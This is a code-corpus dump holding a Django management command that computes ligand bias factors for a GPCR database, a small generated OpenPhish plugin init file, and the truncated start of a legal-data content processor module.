tools/management/commands/build_bias_data.py
|
AlibekMamyrbekov/protwis
|
b3d477b1982623618d995ab5c7f47c918a70238b
|
[
"Apache-2.0"
] | null | null | null |
from decimal import Decimal
import logging
import math
import pandas as pd
import os
from build.management.commands.base_build import Command as BaseBuild
from ligand.models import BiasedExperiment, AnalyzedExperiment, AnalyzedAssay
from django.conf import settings
class Command(BaseBuild):
mylog = logging.getLogger(__name__)
mylog.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s:%(levelname)s:%(message)s')
file_handler = logging.FileHandler('biasDataTest.log')
file_handler.setLevel(logging.ERROR)
file_handler.setFormatter(formatter)
mylog.addHandler(file_handler)
structure_data_dir = os.sep.join(
[settings.DATA_DIR, 'ligand_data', 'gproteins'])
cell_structure_data_dir = os.sep.join(
[settings.DATA_DIR, 'ligand_data', 'cell_line'])
help = 'Reads bias data and imports it'
gprot_cache = dict()
cell_cache = dict()
def add_arguments(self, parser):
parser.add_argument('-u', '--purge',
action='store_true',
dest='purge',
default=False,
help='Purge existing bias records')
def handle(self, *args, **options):
# delete any existing structure data
if options['purge']:
try:
print('Started purging bias data')
Command.purge_bias_data()
print('Ended purging bias data')
except Exception as msg:
print(msg)
print('CREATING BIAS DATA')
self.build_bias_data()
self.logger.info('COMPLETED CREATING BIAS DATA')
@staticmethod
def purge_bias_data():
delete_bias_experiment = AnalyzedExperiment.objects.all()
delete_bias_experiment.delete()
@staticmethod
def process_gproteins_excel():
source_file_path = None
filenames = os.listdir(Command.structure_data_dir)
for source_file in filenames:
source_file_path = os.sep.join(
[Command.structure_data_dir, source_file]).replace('//', '/')
print(source_file, source_file_path)
df = pd.read_excel(source_file_path)
Command.gprot_cache = df.set_index('UniProt').T.to_dict('dict')
@staticmethod
def process_cell_line_excel():
source_file_path = None
filenames = os.listdir(Command.cell_structure_data_dir)
for source_file in filenames:
source_file_path = os.sep.join(
[Command.cell_structure_data_dir, source_file]).replace('//', '/')
print(source_file, source_file_path)
df = pd.read_excel(source_file_path)
Command.cell_cache = df.set_index("Cell_line_name").T.to_dict('dict')
def build_bias_data(self):
print('stage # 1: process excel with g_proteins')
Command.process_gproteins_excel()
Command.process_cell_line_excel()
print('Build bias data gproteins')
context = dict()
content = Command.get_data_from_model()
print('stage # 2 : Getting data finished, data points: ', len(content))
# import pdb; pdb.set_trace()
content_with_children = Command.process_data(content)
print('stage # 3: Processing children in queryset finished',
len(content_with_children))
# import pdb; pdb.set_trace()
changed_data = Command.queryset_to_dict(content_with_children)
print('stage # 4: Converting queryset into dict finished', len(changed_data))
# import pdb; pdb.set_trace()
send = Command.combine_unique(changed_data)
print('stage # 5: Selecting endogenous ligands finished')
# import pdb; pdb.set_trace()
referenced_assay = Command.process_referenced_assays(send)
print('stage # 6: Separating reference assays is finished',
Command._reference_assay_counter)
# import pdb; pdb.set_trace()
ligand_data = Command.separate_ligands(referenced_assay, 'inferred')
# TODO: save for on the fly calculations
print('stage # 7: Separate ligands finished')
# import pdb; pdb.set_trace()
limit_family = Command.process_signalling_proteins(
ligand_data, 'inferred')
print('stage # 8: process_signalling_proteins finished', len(limit_family))
# import pdb; pdb.set_trace()
calculated_assay = Command.process_calculation(limit_family)
# import pdb; pdb.set_trace()
        print('stage # 9: Calculating finished')
Command.count_publications(calculated_assay)
# import pdb; pdb.set_trace()
print('stage # 10: labs and publications counted')
context.update({'data': calculated_assay})
# import pdb; pdb.set_trace()
print('stage # 11: combining data into common dict is finished')
# save dataset to model
Command.save_data_to_model(context, 'different_family')
print('stage # 12: saving data to model is finished')
print('\nStarted processing subtypes')
ligand_data = Command.separate_ligands(referenced_assay, 'subtypes')
# subtypes part
print('stage # 13: Separate ligands finished')
limit_family = Command.process_signalling_proteins(
ligand_data, 'subtypes')
# import pdb; pdb.set_trace()
print('stage # 14: process_signalling_proteins finished', len(limit_family))
calculated_assay = Command.process_calculation(limit_family)
# import pdb; pdb.set_trace()
        print('stage # 15: Calculating finished')
Command.count_publications(calculated_assay)
# import pdb; pdb.set_trace()
print('stage # 16: labs and publications counted')
context.update({'data': calculated_assay})
# import pdb; pdb.set_trace()
print('stage # 17: combining data into common dict is finished')
# save dataset to model
Command.save_data_to_model(context, 'sub_different_family')
print('stage # 18: saving data to model is finished')
@staticmethod
def get_data_from_model():
try:
content = BiasedExperiment.objects.all().prefetch_related(
'experiment_data', 'ligand', 'receptor', 'publication', 'publication__web_link', 'experiment_data__emax_ligand_reference',
).order_by('publication', 'receptor', 'ligand')
except BiasedExperiment.DoesNotExist:
content = None
return content
@staticmethod
def process_data(content):
rd = []
counter = 0
for instance in enumerate(content):
temp_obj = []
fin_obj = {}
fin_obj['main'] = (instance[1])
vendor_counter = 0
for i in instance[1].experiment_data_vendors.all():
vendor_counter = vendor_counter + 1
for entry in instance[1].experiment_data.all():
author_list = list()
for author in entry.experiment_data_authors.all():
author_list.append(author.author)
temp_obj.append(entry)
counter += 1
fin_obj['authors'] = author_list
fin_obj['children'] = temp_obj
fin_obj['vendor_counter'] = vendor_counter
rd.append(fin_obj)
return rd
@staticmethod
def process_g_protein(protein, receptor):
receptor_name = receptor.entry_name.split('_')[0].upper()
if receptor_name in Command.gprot_cache:
protein = Command.gprot_cache[receptor_name]["1'Gfam"]
return protein
@staticmethod
def process_cell_line(cell_line):
if cell_line in Command.cell_cache:
_species = Command.cell_cache[cell_line]["Species"]
_tissue = Command.cell_cache[cell_line]["Tissue/organ"]
else:
_species = cell_line
_tissue = cell_line
return _species, _tissue
@staticmethod
def queryset_to_dict(results):
'''
        Merge bias experiment data with assay data
'''
send = list()
for j in results:
temp_dict = dict()
temp = dict()
temp['reference'] = list()
temp['assay'] = dict()
temp['ref_ligand_experiment'] = dict()
doubles = []
temp['publication'] = j['main'].publication
temp['species'] = j['main'].receptor.species.common_name
temp['ligand'] = j['main'].ligand
temp['endogenous_ligand'] = j['main'].endogenous_ligand
temp['auxiliary_protein'] = j['main'].auxiliary_protein
temp['receptor'] = j['main'].receptor
temp['receptor_isoform'] = j['main'].receptor_isoform
temp['receptor_gtpo'] = j['main'].receptor_gtpo
temp['vendor_counter'] = j['vendor_counter']
temp['authors'] = j['authors']
temp['article_quantity'] = 0
temp['labs_quantity'] = 0
if j['children']:
temp_dict = Command.process_children_from_queryset(
j, temp['receptor'])
if temp_dict is not None:
doubles.append(temp_dict)
temp['assay'] = doubles
send.append(temp)
return send
@staticmethod
def process_children_from_queryset(j, receptor):
temp_dict = dict()
temp_dict['assay_initial'] = j['children'][0]
temp_dict['ligand_source_id'] = j['main'].ligand_source_id
temp_dict['ligand_source_type'] = j['main'].ligand_source_type
temp_dict['potency'] = None
temp_dict['pathway_level'] = j['children'][0].pathway_level
temp_dict['delta_relative_transduction_coef'] = None
temp_dict['log_bias_factor'] = None
temp_dict['delta_emax_ec50'] = None
temp_dict['calculated_relative_tau'] = None
temp_dict['order_no'] = 0
temp_dict['endogenous_assay'] = dict() # shall be only one
temp_dict['signalling_protein'] = j['children'][0].signalling_protein
temp_dict['cell_line'] = j['children'][0].cell_line
        temp_dict['_species'], temp_dict['_tissue'] = Command.process_cell_line(
            temp_dict['cell_line'])
temp_dict['family'] = j['children'][0].family
if temp_dict['family'] == 'G protein':
temp_dict['family'] = Command.process_g_protein(
temp_dict['family'], receptor)
if temp_dict['family'] == 'Gq/11 or Gi/o':
temp_dict['family'] = 'Gq/11'
temp_dict['measured_biological_process'] = j['children'][0].measured_biological_process
temp_dict['assay_type'] = j['children'][0].assay_type
temp_dict['assay_time_resolved'] = j['children'][0].assay_time_resolved
temp_dict['signal_detection_tecnique'] = j['children'][0].signal_detection_tecnique
temp_dict['molecule_1'] = j['children'][0].molecule_1
temp_dict['molecule_2'] = j['children'][0].molecule_2
temp_dict['quantitive_activity'] = j['children'][0].quantitive_activity
temp_dict['quantitive_activity_initial'] = j['children'][0].quantitive_activity
temp_dict['qualitative_activity'] = j['children'][0].qualitative_activity
temp_dict['quantitive_unit'] = j['children'][0].quantitive_unit
temp_dict['quantitive_efficacy'] = j['children'][0].quantitive_efficacy
temp_dict['efficacy_unit'] = j['children'][0].efficacy_unit
temp_dict['quantitive_measure_type'] = j['children'][0].quantitive_measure_type
temp_dict['efficacy_measure_type'] = j['children'][0].efficacy_measure_type
temp_dict['transduction_coef'] = j['children'][0].transduction_coef
temp_dict['relative_transduction_coef'] = j['children'][0].relative_transduction_coef
temp_dict['bias_reference'] = j['children'][0].bias_reference
temp_dict['emax_reference_ligand'] = j['children'][0].emax_ligand_reference
temp_dict['ligand_function'] = j['children'][0].ligand_function
temp_dict['ligand'] = j['main'].ligand
temp_dict['quantitive_activity'], temp_dict['quantitive_activity_initial'] = Command.process_ec50_children_from_queryset(
temp_dict)
return temp_dict
@staticmethod
def process_ec50_children_from_queryset(temp_dict):
try:
temp_dict['quantitive_activity'] = float(
temp_dict['quantitive_activity'])
except:
temp_dict['quantitive_activity'] = temp_dict['quantitive_activity']
if (temp_dict['quantitive_activity_initial'] and
temp_dict['quantitive_measure_type'] != "Effect at single point measurement"):
temp_dict['quantitive_activity_initial'] = (-1) * math.log10(
temp_dict['quantitive_activity_initial'])
temp_dict['quantitive_activity_initial'] = "{:.2F}".format(
Decimal(temp_dict['quantitive_activity_initial']))
return temp_dict['quantitive_activity'], temp_dict['quantitive_activity_initial']
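    # Worked example of the conversion above (illustrative numbers only, assuming
    # the raw value is an EC50 in molar units): an EC50 of 1e-8 M becomes a pEC50
    # of -log10(1e-8) = 8, stored as the string '8.00'.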
@staticmethod
def combine_unique(data):
'''
combining tested assays and reference assays
'''
_counter_of_assays = 0
context = dict()
for j in data:
name = str(j['publication'].id) + \
'/' + str(j['receptor'].id)
temp_obj = list()
if name in context:
temp_obj = context[name]['assay']
for i in j['assay']:
temp_obj.append(i)
context[name] = j
context[name]['assay'] = temp_obj
_counter_of_assays = _counter_of_assays + \
len(context[name]['assay'])
print("******len of experiments:", len(context), "******")
print("******len of assays:", _counter_of_assays, "******")
return context
@staticmethod
def process_referenced_assays(data):
'''
separate tested assays and reference assays
'''
for j in data.items():
            assays, reference = Command.return_referenced_assays(j[1]['assay'])
j[1]['assay_list'] = assays
j[1]['reference_assays_list'] = reference
j[1].pop('assay')
return data
_reference_assay_counter = 0
_tested_assay_counter = 0
@staticmethod
def check_endogenous_assay_numbers(number):
        return number is not None
@staticmethod
    def return_referenced_assays(assays):
main, reference = list(), list()
for assay in assays:
# TODO: change to primary_Endogenous
if (assay['bias_reference'] == 'Ref. and principal endo.' or
assay['bias_reference'] == 'Endogenous' or
assay['bias_reference'] == 'Principal endogenous' or
assay['bias_reference'] == 'Ref. and endo.'):
_ec50 = Command.check_endogenous_assay_numbers(assay['quantitive_activity'])
_tau = Command.check_endogenous_assay_numbers(assay['transduction_coef'])
_delta_tau = Command.check_endogenous_assay_numbers(assay['relative_transduction_coef'])
if any([_ec50,_tau,_delta_tau]):
# if assay['quantitive_activity'] is not None:
reference.append(assay)
Command._reference_assay_counter = Command._reference_assay_counter + 1
else:
main.append(assay)
Command._tested_assay_counter = Command._tested_assay_counter + 1
main = Command.fetch_endogenous_assay(main, reference)
return main, reference
@staticmethod
def fetch_endogenous_assay(main, references):
result_list = list()
for assay in main:
temp_reference_list = list()
for reference in references:
if assay['family'] == reference['family']:
if assay['signalling_protein'] == reference['signalling_protein']:
if assay['assay_type'] == reference['assay_type']:
if assay['cell_line'] == reference['cell_line']:
if assay['measured_biological_process'] == reference['measured_biological_process']:
temp_reference_list.append(reference)
if len(temp_reference_list)>0:
if len(temp_reference_list)>1:
final_end = None
for _reference_assay in temp_reference_list:
if _reference_assay['bias_reference'] == "Principal endogenous" or _reference_assay['bias_reference'] == "Ref. and principal endo.":
assay['endogenous_assay'] = _reference_assay
final_end = _reference_assay
break
else:
assay['endogenous_assay'] = _reference_assay
final_end = _reference_assay
for _reference_assay in temp_reference_list:
if _reference_assay['bias_reference'] != "Principal endogenous" and _reference_assay['bias_reference'] != "Ref. and principal endo.":
_reference_assay['endogenous_assay'] = final_end
result_list.append(_reference_assay)
else:
assay['endogenous_assay'] = temp_reference_list[0]
for assay in main:
if len(assay['endogenous_assay']) > 0:
assay['calculated_relative_tau'] = Command.calculate_relative_transduction_coef(assay)
result_list.append(assay)
return result_list
@staticmethod
def separate_ligands(context, command):
content = dict()
for i in context.items():
for assay in i[1]['assay_list']:
_pub_name = str(i[1]['publication'].id)
_ligand_name = str(assay['ligand'].id)
_receptor_name = str(i[1]['receptor'].id)
_receptor_iso_name = str(i[1]['receptor_isoform'])
_aux_prot_name = str(i[1]['auxiliary_protein'])
_tissue = assay['_tissue']
_species = assay['_species']
_pathway = assay['pathway_level']
if command == 'inferred':
name = _pub_name+'/'+_ligand_name+'/'+_receptor_name+'/'+_receptor_iso_name+'/'+_aux_prot_name+'/'+_tissue+'/'+_species
                    # maybe also add cell line, tissue, species and assay type to the key
elif command == 'subtypes':
name = _pub_name+'/'+_ligand_name+'/'+_receptor_name+'/'+_receptor_iso_name+'/'+_aux_prot_name+'/'+str(assay['family'])+'/'+_tissue+'/'+_species
                    # maybe also add cell line, tissue, species and assay type to the key
if name in content:
content[name]['assay_list'].append(assay)
else:
content[name] = dict()
content[name]['assay_list'] = list()
content[name]['publication'] = i[1]['publication']
content[name]['ligand'] = assay['ligand']
content[name]['receptor_isoform']=i[1]['receptor_isoform']
content[name]['receptor_gtpo']=i[1]['receptor_gtpo']
content[name]['ligand_links'] = Command.get_external_ligand_ids(
content[name]['ligand'])
try:
content[name]['reference_ligand'] = i[1]['reference_assays_list'][0]['ligand']
except:
content[name]['reference_ligand'] = None
content[name]['auxiliary_protein'] = i[1]['auxiliary_protein']
# TODO: add external LigandStatistics
content[name]['endogenous_ligand'] = i[1]['endogenous_ligand']
content[name]['receptor'] = i[1]['receptor']
content[name]['vendor_counter'] = i[1]['vendor_counter']
content[name]['authors'] = i[1]['authors']
content[name]['article_quantity'] = i[1]['article_quantity']
content[name]['labs_quantity'] = i[1]['labs_quantity']
content[name]['assay_list'].append(assay)
content[name]['ligand_source_id'] = assay['ligand_source_id']
content[name]['ligand_source_type'] = assay['ligand_source_type']
return content
@staticmethod
def get_external_ligand_ids(ligand):
ligand_list = list()
try:
for i in ligand.properities.web_links.all():
ligand_list.append(
{'name': i.web_resource.name, "link": i.index})
except:
ligand_list = list()
return ligand_list
@staticmethod
def process_signalling_proteins(context, command):
for i in context.items():
i[1]['assay_list'] = Command.calculate_bias_factor_value(
i[1]['assay_list'])
i[1]['assay_list'] = Command.sort_assay_list(i[1]['assay_list'])
i[1]['backup_assays'] = i[1]['assay_list']
i[1]['assay_list'] = Command.limit_family_set(i[1]['assay_list'], command)
# TODO: order by transduction_coef
i[1]['assay_list'] = Command.order_assays(i[1]['assay_list'])
return context
@staticmethod
def order_assays(assays):
try:
sorted_assay = sorted(assays, key=lambda k: k['calculated_relative_tau'], reverse=True)
except:
try:
sorted_assay = sorted(assays, key=lambda k: k['relative_transduction_coef'], reverse=True)
except:
sorted_assay = sorted(assays, key=lambda k: k['delta_emax_ec50']
if k['delta_emax_ec50'] else float(-1000), reverse=True)
for item in enumerate(sorted_assay):
item[1]['order_no'] = item[0]
return assays
@staticmethod
def limit_family_set(assay_list, command):
families = list()
proteins = set()
if command == 'inferred':
option = 'family'
else:
option = 'signalling_protein'
for assay in assay_list:
if assay[option] not in proteins:
proteins.add(assay[option])
families.append(assay)
else:
try:
compare_val = next(
item for item in families if item[option] == assay[option])
except StopIteration:
pass
if assay['calculated_relative_tau']:
try:
if assay['calculated_relative_tau'] > compare_val['calculated_relative_tau']:
families[:] = [d for d in families if d.get(
option) != compare_val[option]]
except:
families[:] = [d for d in families if d.get(
option) != compare_val[option]]
elif assay['relative_transduction_coef']:
try:
if assay['relative_transduction_coef'] > compare_val['relative_transduction_coef']:
families[:] = [d for d in families if d.get(
option) != compare_val[option]]
except:
families[:] = [d for d in families if d.get(
option) != compare_val[option]]
elif assay['transduction_coef']:
try:
if assay['transduction_coef'] > compare_val['transduction_coef']:
families[:] = [d for d in families if d.get(
option) != compare_val[option]]
except:
families[:] = [d for d in families if d.get(
option) != compare_val[option]]
else:
if (assay['delta_emax_ec50'] is not None and compare_val['delta_emax_ec50'] is not None):
if assay['delta_emax_ec50'] > compare_val['delta_emax_ec50']:
families[:] = [d for d in families if d.get(
option) != compare_val[option]]
families.append(assay)
return families
@staticmethod
def sort_assay_list(i):
return_assay = dict()
return_assay = sorted(i, key=lambda k: k['delta_emax_ec50']
if k['delta_emax_ec50'] else float(-1000), reverse=True)
return return_assay
@staticmethod
def calculate_bias_factor_value(sorted_assays):
# TODO: pick
for assay in sorted_assays:
if assay['delta_emax_ec50']:
temp_value = Command.calc_order_bias_value(
assay, assay['endogenous_assay'])
try:
if assay['delta_emax_ec50'] < temp_value:
assay['delta_emax_ec50'] = temp_value
except:
pass
else:
assay['delta_emax_ec50'] = Command.calc_order_bias_value(
assay, assay['endogenous_assay'])
return sorted_assays
@staticmethod
def calc_order_bias_value(assay,reference):
result = None
try:
assay_a = assay['quantitive_activity']
assay_b = assay['quantitive_efficacy']
reference_a = reference['quantitive_activity']
reference_b = reference['quantitive_efficacy']
result = math.log10((assay_b / assay_a)) - \
math.log10((reference_b / reference_a))
except:
try:
if assay['quantitive_activity_initial']:
assay_a = float(assay['quantitive_activity_initial'])
assay_a = 10**(assay_a*(-1))
assay_b = assay['quantitive_efficacy']
reference_a = reference['quantitive_activity']
reference_b = reference['quantitive_efficacy']
result = math.log10((assay_b / assay_a)) - \
math.log10((reference_b / reference_a))
except:
# import pdb; pdb.set_trace()
result = None
return result
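    # Formula behind calc_order_bias_value (restating the code above, with
    # illustrative numbers only):
    #     delta log(Emax/EC50) = log10(Emax_ligand / EC50_ligand)
    #                            - log10(Emax_reference / EC50_reference)
    # e.g. Emax 100 / EC50 1e-8 vs. a reference with Emax 100 / EC50 1e-7 gives
    # 10 - 9 = 1.0. Units are assumed to match between ligand and reference.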
@staticmethod
def process_calculation(context):
list_to_remove = list()
for i in context.items():
if len(i[1]['assay_list'])>1:
for assay in i[1]['assay_list']:
if assay['order_no'] == 0 and assay['delta_emax_ec50'] is None:
list_to_remove.append(i[0])
i[1]['biasdata'] = i[1]['assay_list']
i[1].pop('assay_list')
# calculate log bias
Command.calc_bias_factor(i[1]['biasdata'])
# Command.calc_potency_and_transduction(i[1]['biasdata'])
else:
list_to_remove.append(i[0])
for experiment in list_to_remove:
context.pop(experiment)
return context
@staticmethod
def calc_bias_factor(biasdata):
most_potent = dict()
for i in biasdata:
if i['order_no'] == 0:
most_potent = i
for i in biasdata:
if i['order_no'] != 0:
try:
i['potency'] = round(
i['quantitive_activity'] / most_potent['quantitive_activity'], 1)
except:
i['potency'] = None
                i['relative_transduction_coef'], i['delta_relative_transduction_coef'] = Command.calculate_transduction(most_potent, i)
i['log_bias_factor'] = Command.lbf_process_qualitative_data(i)
if i['log_bias_factor'] == None:
# import pdb; pdb.set_trace()
i['log_bias_factor'] = Command.lbf_process_efficacy(i)
if i['log_bias_factor'] == None:
# import pdb; pdb.set_trace()
i['log_bias_factor'] = Command.lbf_calculate_bias(
i,most_potent)
if i['log_bias_factor'] == None:
i['log_bias_factor'] = Command.lbf_process_ic50(i)
@staticmethod
    def calculate_transduction(most_potent, i):
result = None
pre_result = None
if most_potent['calculated_relative_tau'] is not None:
if i['transduction_coef']:
try:
pre_result = Command.calculate_relative_transduction_coef(i)
result = most_potent['calculated_relative_tau'] - pre_result
# print('***calculated***', result)
except:
pre_result = None
result = None
elif i['transduction_coef'] is None and i['relative_transduction_coef']:
try:
if i['endogenous_assay']['relative_transduction_coef'] and i['endogenous_assay']['relative_transduction_coef'] == 0:
if most_potent['relative_transduction_coef'] is not None:
try:
pre_result = i['relative_transduction_coef']
result = most_potent['relative_transduction_coef'] - i['relative_transduction_coef']
except Exception:
pre_result = None
result = None
except:
pre_result = None
result = None
elif most_potent['relative_transduction_coef'] is not None:
try:
if most_potent['endogenous_assay']['relative_transduction_coef'] and most_potent['endogenous_assay']['relative_transduction_coef'] == 0:
try:
pre_result = i['relative_transduction_coef']
result = most_potent['relative_transduction_coef'] - i['relative_transduction_coef']
except Exception:
pre_result = None
result = None
except:
pre_result = None
result = None
return pre_result, result
@staticmethod
def calculate_relative_transduction_coef(i):
relative_transduction_coef = None
try:
if i['transduction_coef'] is not None:
relative_transduction_coef = i['transduction_coef'] - i['endogenous_assay']['transduction_coef']
except Exception:
relative_transduction_coef = None
return relative_transduction_coef
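    # Interpretation note (assuming transduction_coef stores log(tau/KA)-style
    # values, the usual convention for operational-model fits):
    #     relative coefficient = log(tau/KA)_ligand - log(tau/KA)_endogenous_reference
    # is what calculate_relative_transduction_coef returns; the delta helper
    # before it then subtracts pathway i's relative coefficient from that of the
    # most potent pathway to obtain the between-pathway delta used for bias.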
@staticmethod
def lbf_process_qualitative_data(i):
return_message = None
try:
if i['qualitative_activity'] == 'No activity':
return_message = "Full Bias"
elif i['qualitative_activity'] == 'Low activity':
return_message = "High Bias"
elif i['qualitative_activity'] == 'High activity':
return_message = "Low Bias"
elif i['qualitative_activity'] == 'Inverse agonism/antagonism':
return_message = "Full Bias"
except:
return_message = None
return return_message
@staticmethod
def lbf_process_efficacy(i):
return_message = None
try:
if i['quantitive_efficacy'] == 0:
return_message = "Full Bias"
except:
return_message = None
return return_message
@staticmethod
def lbf_calculate_bias(i, most_potent):
return_message = None
try:
temp_calculation = most_potent['delta_emax_ec50'] - i['delta_emax_ec50']
return_message = round(temp_calculation, 1)
except:
return_message = None
return return_message
@staticmethod
def lbf_process_ic50(i):
return_message = None
try:
if (i['quantitive_measure_type'].lower() == 'ic50' and
i['endogenous_assay']['quantitive_measure_type'].lower() == 'ic50'):
return_message = 'Only agonist in main pathway'
except:
return_message = None
return return_message
@staticmethod
def count_publications(context):
temp = dict()
for i in context.items():
labs = list()
i[1]['labs'] = 0
labs.append(i[1]['publication'])
lab_counter = 1
for j in context.items():
if j[1]['publication'] not in labs:
if set(i[1]['authors']) & set(j[1]['authors']):
lab_counter += 1
labs.append(j[1]['publication'])
i[1]['labs'] = lab_counter
temp_obj = 1
name = str(i[1]['endogenous_ligand']) + \
'/' + str(i[1]['ligand'])+'/'+str(i[1]['receptor'])
if name in temp:
for assays in i[1]['biasdata']:
if assays['order_no'] > 0:
if assays['log_bias_factor'] != None and assays['log_bias_factor'] != '' or assays['delta_relative_transduction_coef'] != None and assays['delta_relative_transduction_coef'] != '':
temp_obj = temp[name] + 1
temp[name] = temp_obj
for i in context.items():
temp_obj = 0
name = str(i[1]['endogenous_ligand']) + \
'/' + str(i[1]['ligand'])+'/'+str(i[1]['receptor'])
if name in temp:
i[1]['article_quantity'] = temp[name]
@staticmethod
def save_data_to_model(context, source):
for i in context['data'].items():
if len(i[1]['biasdata']) > 1:
experiment_entry = AnalyzedExperiment(publication=i[1]['publication'],
ligand=i[1]['ligand'],
external_ligand_ids=i[1]['ligand_links'],
receptor=i[1]['receptor'],
source=source,
receptor_isoform=i[1]['receptor_isoform'],
receptor_gtpo=i[1]['receptor_gtpo'],
endogenous_ligand=i[1]['endogenous_ligand'],
vendor_quantity=i[1]['vendor_counter'],
reference_ligand=i[1]['reference_ligand'],
article_quantity=i[1]['article_quantity'],
labs_quantity=i[1]['labs'],
ligand_source_id=i[1]['ligand_source_id'],
ligand_source_type=i[1]['ligand_source_type']
)
experiment_entry.save()
for ex in i[1]['biasdata']:
# try:
if ex['endogenous_assay'] is not None:
try:
ex['log_bias_factor'] = round(
ex['log_bias_factor'], 1)
except:
ex['log_bias_factor'] = ex['log_bias_factor']
try:
ex['delta_emax_ec50'] = round(ex['delta_emax_ec50'], 1)
except:
ex['delta_emax_ec50'] = ex['delta_emax_ec50']
try:
if ex['calculated_relative_tau'] is not None:
ex['relative_transduction_coef'] = ex['calculated_relative_tau']
ex['transduction_coef'] = round(ex['transduction_coef'], 1)
ex['relative_transduction_coef'] = round(ex['relative_transduction_coef'], 1)
ex['delta_relative_transduction_coef'] = round(ex['delta_relative_transduction_coef'],1)
except:
ex['transduction_coef'] = ex['transduction_coef']
ex['relative_transduction_coef'] = ex['relative_transduction_coef']
ex['delta_relative_transduction_coef'] = ex['delta_relative_transduction_coef']
try:
ex['quantitive_activity'] = round(
ex['quantitive_activity'], 1)
except:
ex['quantitive_activity'] = ex['quantitive_activity']
try:
ex['quantitive_efficacy'] = int(
ex['quantitive_efficacy'])
except:
ex['quantitive_efficacy'] = ex['quantitive_efficacy']
emax_ligand = ex['emax_reference_ligand']
try:
endogenous_assay_used = ex['endogenous_assay']['assay_initial']
except:
import pdb; pdb.set_trace()
assay_description = 'tested_assays'
if source == 'sub_different_family':
assay_description = 'sub_tested_assays'
experiment_assay = AnalyzedAssay(experiment=experiment_entry,
assay_description=assay_description,
family=ex['family'],
order_no=ex['order_no'],
signalling_protein=ex['signalling_protein'],
cell_line=ex['cell_line'],
assay_type=ex['assay_type'],
pathway_level=ex['pathway_level'],
reference_assay_initial = endogenous_assay_used,
molecule_1=ex['molecule_1'],
molecule_2=ex['molecule_2'],
assay_time_resolved=ex['assay_time_resolved'],
ligand_function=ex['ligand_function'],
quantitive_measure_type=ex['quantitive_measure_type'],
quantitive_activity=ex['quantitive_activity'],
quantitive_activity_initial=ex['quantitive_activity_initial'],
quantitive_unit=ex['quantitive_unit'],
qualitative_activity=ex['qualitative_activity'],
quantitive_efficacy=ex['quantitive_efficacy'],
efficacy_measure_type=ex['efficacy_measure_type'],
efficacy_unit=ex['efficacy_unit'],
potency=ex['potency'],
relative_transduction_coef=ex['relative_transduction_coef'],
transduction_coef=ex['transduction_coef'],
delta_relative_transduction_coef=ex['delta_relative_transduction_coef'],
log_bias_factor=ex['log_bias_factor'],
delta_emax_ec50=ex['delta_emax_ec50'],
effector_family=ex['family'],
measured_biological_process=ex['measured_biological_process'],
signal_detection_tecnique=ex['signal_detection_tecnique'],
emax_ligand_reference=emax_ligand
)
experiment_assay.save()
for ex in i[1]['backup_assays']:
assay_description = 'backup_assays'
if source == 'sub_different_family':
assay_description = 'sub_backup_assays'
experiment_assay = AnalyzedAssay(experiment=experiment_entry,
reference_assay_initial = None,
family=ex['family'],
order_no=ex['order_no'],
signalling_protein=ex['signalling_protein'],
cell_line=ex['cell_line'],
assay_type=ex['assay_type'],
assay_description=assay_description,
molecule_1=ex['molecule_1'],
molecule_2=ex['molecule_2'],
assay_time_resolved=ex['assay_time_resolved'],
ligand_function=ex['ligand_function'],
quantitive_measure_type=ex['quantitive_measure_type'],
quantitive_activity=ex['quantitive_activity'],
quantitive_activity_initial=ex['quantitive_activity_initial'],
quantitive_unit=ex['quantitive_unit'],
qualitative_activity=ex['qualitative_activity'],
quantitive_efficacy=ex['quantitive_efficacy'],
efficacy_measure_type=ex['efficacy_measure_type'],
efficacy_unit=ex['efficacy_unit'],
potency=ex['potency'],
relative_transduction_coef=ex['relative_transduction_coef'],
transduction_coef=ex['transduction_coef'],
log_bias_factor=ex['log_bias_factor'],
delta_emax_ec50=ex['delta_emax_ec50'],
effector_family=ex['family'],
measured_biological_process=ex['measured_biological_process'],
signal_detection_tecnique=ex['signal_detection_tecnique'],
emax_ligand_reference=ex['ligand']
)
experiment_assay.save()
| 50.110102
| 204
| 0.52665
|
8f1dd4b3fcea8841f1725ebadb2d6e995c47c438
| 74
|
py
|
Python
|
plugins/openphish/komand_openphish/triggers/save_feed_file/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 46
|
2019-06-05T20:47:58.000Z
|
2022-03-29T10:18:01.000Z
|
plugins/openphish/komand_openphish/triggers/save_feed_file/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 386
|
2019-06-07T20:20:39.000Z
|
2022-03-30T17:35:01.000Z
|
plugins/openphish/komand_openphish/triggers/save_feed_file/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 43
|
2019-07-09T14:13:58.000Z
|
2022-03-28T12:04:46.000Z
|
# GENERATED BY KOMAND SDK - DO NOT EDIT
from .trigger import SaveFeedFile
| 24.666667
| 39
| 0.783784
|
b9aff89920212d9537e9d1d11ae5861e1fbec7b7
| 12,926
|
py
|
Python
|
oldp/apps/processing/content_processor.py
|
docsuleman/oldp
|
8dcaa8e6e435794c872346b5014945ace885adb4
|
[
"MIT"
] | 66
|
2018-05-07T12:34:39.000Z
|
2022-02-23T20:14:24.000Z
|
oldp/apps/processing/content_processor.py
|
Justice-PLP-DHV/oldp
|
eadf235bb0925453d9a5b81963a0ce53afeb17fd
|
[
"MIT"
] | 68
|
2018-06-11T16:13:17.000Z
|
2022-02-10T08:03:26.000Z
|
oldp/apps/processing/content_processor.py
|
Justice-PLP-DHV/oldp
|
eadf235bb0925453d9a5b81963a0ce53afeb17fd
|
[
"MIT"
] | 15
|
2018-06-23T19:41:13.000Z
|
2021-08-18T08:21:49.000Z
|
import glob
import logging.config
import os
from enum import Enum
from importlib import import_module
from typing import List
from urllib.parse import parse_qsl
from django.conf import settings
from django.db.models import Model
from oldp.apps.processing.errors import ProcessingError
from oldp.apps.processing.processing_steps import BaseProcessingStep
ContentStorage = Enum('ContentStorage', 'ES FS DB')
logger = logging.getLogger(__name__)
class InputHandler(object):
input_selector = None # Can be single, list, ... depends on get_content
input_limit = 0 # 0 = unlimited
input_start = 0
skip_pre_processing = False
pre_processed_content = []
def __init__(self, limit=0, start=0, selector=None, *args, **kwargs):
self.input_limit = limit
self.input_selector = selector
self.input_start = start
def handle_input(self, input_content) -> None:
